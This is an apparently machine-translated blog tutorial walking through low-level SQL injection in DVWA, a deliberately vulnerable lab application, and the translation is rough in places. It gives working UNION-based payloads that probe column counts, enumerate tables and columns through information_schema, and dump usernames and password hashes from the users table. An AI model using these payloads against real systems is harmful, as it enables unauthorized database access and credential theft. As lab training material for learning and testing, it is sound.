[Network Security]SQL injection of DVWA—low level
免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。
Readers are asked to install DVWA by themselves, and this article will not repeat them.
Determine the type of vulnerability
For the principle of judging the type of vulnerability, please refer to [Network Security] SQL Injection Principle and Analysis of Common Attack Methods
- Determine whether it is a digital injection
If it is a numeric injection, the second statement should echo Error or not echo.
- Determine whether it is a character injection
The second statement is not echoed, so the vulnerability type is a character injection vulnerability.
Determine the number of injection points
When inputting 1' order by 4#
, the echo indicates that the Unknown column '4' in 'order clause'
guessed number of injection points is too large
.1' order by 2#
1' order by 3#
Unknown column '3' in 'order clause'
Burst library name
Enter 1' union select 1,database()#
echoes a database name
The first paragraph in the picture is the information of the first injection point, and the second paragraph is the information of the second injection point (database).
Explode current username
Input 1' union select 1,user()#
Since there are two injection points, we can query both the database name and the current user name through a sql statement
Input 1' union select user(),database()#
Note, if used 1' union select user()#
, it will echo The used SELECT statements have a different number of columns (the SELECT statement used have a different number of columns), because there is only one injection point for the statement.
Explosive name
Input The following statement can also be used to1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#
echo the two table names of guestbook and users . Among them, the function of group_concat is to connect multiple values into a string and connect them with commas.
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#
Explosive list
Input 1' union select 1, column_name from information_schema.columns where table_name='users'#
or 1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
In contrast, in the case of too many query results, it is recommended to use group_concat to gather the query results
burst field
enter1' union select user,password from users#
Error analysis and solution
If this error occurs during the SQL joint injection process: the collation rule of the table in the illegal mix of collations for operation UNION
原因如下:
information_schema is utf8_general_ci, and the field in the user table defaults to utf8_unicode_ci, resulting in a character sort mismatch.
解决方法:
- Open phpMyAdmin in phpstudy
- Enter the user table in the dvwa database, change the sorting rules of each column to utf8_gengeral_ci, and save it.
Summarize
The above is a detailed analysis of DVWA's SQL injection-low level problem solving, readers can use this to simply understand the SQL injection method.
后续会分享DVWA之SQL注入—Medium level攻击姿势及解题详析。
I am Qiu said , see you next time.